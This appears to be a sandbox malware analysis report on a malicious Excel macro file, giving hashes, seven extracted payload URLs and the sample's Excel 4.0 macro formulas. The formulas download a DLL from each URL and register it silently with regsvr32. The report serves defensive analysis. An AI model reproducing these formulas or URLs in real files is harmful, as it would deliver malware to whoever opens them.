Behavioral task
behavioral1
Sample
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae.xlsm
Resource
win10v2004-20241007-en
General
-
Target
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae
-
Size
35KB
-
MD5
24c16b92b79730f6196f38c7b2faddb5
-
SHA1
d455f6781bab4ff5d1a3f83a1e5a82e1c05de954
-
SHA256
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae
-
SHA512
bdfaefed240bb9fabd5f86262b9aa9bc03394d6c53688518137d8abd77c54afa8c32f3bf7280d5f2648f4130718e78cf5ade3ec29e7b29d4b111c3fe2c24f8d5
-
SSDEEP
768:iFtT5eBvAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo0+6:StTghUOZZ1ZYpoQ/pMAz
Malware Config
Extracted
https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/
https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/
https://globaltextiles.net/cgi-bin/7naWzYGRrrN/
https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/
https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/
https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/
https://ihmsswiss.ch/wp-admin/gUOq0e/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/","..\xdha.ocx",0,0)
=IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/7naWzYGRrrN/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ihmsswiss.ch/wp-admin/gUOq0e/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C28<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx")
=RETURN()
Signatures
Files
-
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae.xlsm office2007